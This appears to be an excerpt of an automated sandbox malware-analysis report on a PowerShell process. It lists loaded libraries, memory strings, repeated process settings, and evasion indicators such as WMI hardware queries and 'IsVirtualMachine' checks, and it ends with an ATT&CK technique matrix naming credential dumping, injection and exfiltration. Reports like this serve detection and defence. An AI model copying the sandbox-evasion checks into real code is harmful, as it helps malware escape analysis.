Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.19711562814.0000012D47476000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 6?lib.pdbpdblib.pdbR source: powershell.exe, 00000000.00000002.19711562814.0000012D473FF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbQ source: powershell.exe, 00000000.00000002.19714097677.0000012D47632000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000000.00000002.19713429136.0000012D474F2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: scorlib.pdb% source: powershell.exe, 00000000.00000002.19711562814.0000012D473FF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000000.00000002.19713678701.0000012D475E0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.19711562814.0000012D4747A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.19714097677.0000012D47627000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 364e35\System.Management.Automation.pdb, source: powershell.exe, 00000000.00000002.19711562814.0000012D473FF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 source: powershell.exe, 00000000.00000002.19713678701.0000012D475E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ion.pdb@ source: powershell.exe, 00000000.00000002.19711562814.0000012D473FF000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD0859D2A5 pushad ; iretd 0_2_00007FFD0859D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD086B7918 push ebx; retf 0_2_00007FFD086B794A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD086B2315 pushad ; iretd 0_2_00007FFD086B232D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD086B5F63 pushad ; ret 0_2_00007FFD086B5F71
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD0896131A pushad ; ret 0_2_00007FFD08961319
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD089612F5 pushad ; ret 0_2_00007FFD08961319

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9922Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: powershell.exe, 00000000.00000002.19713678701.0000012D475E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IsVirtualMachineMSFT_MpComputerStatusMSFT_MpComputerStatus
Source: powershell.exe, 00000000.00000002.19705043649.0000012D3F28D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: <!-- IFRpbWUtU3RhbXAgUENBIDIwMTAwDQYJKoZIhvcNAQEFBQACBQDk2nlVMCIYDzIw -->
Source: powershell.exe, 00000000.00000002.19711562814.0000012D473C8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.19711562814.0000012D473FF000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.19683260823.0000012D2F96C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: IsVirtualMachine
Source: powershell.exe, 00000000.00000002.19711562814.0000012D473C8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.19711562814.0000012D473FF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: booleanIsVirtualMachine
Source: powershell.exe, 00000000.00000002.19714097677.0000012D47632000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Windows Management Instrumentation
1
DLL Side-Loading
1
Process Injection
1
Virtualization/Sandbox Evasion
OS Credential Dumping21
Security Software Discovery
Remote Services1
Archive Collected Data
1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
PowerShell
Boot or Logon Initialization Scripts1
DLL Side-Loading
1
Process Injection
LSASS Memory1
Virtualization/Sandbox Evasion
Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Obfuscated Files or Information
Security Account Manager1
Process Discovery
SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
DLL Side-Loading
NTDS1
Application Window Discovery
Distributed Component Object ModelInput Capture12
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets2
File and Directory Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials11
System Information Discovery
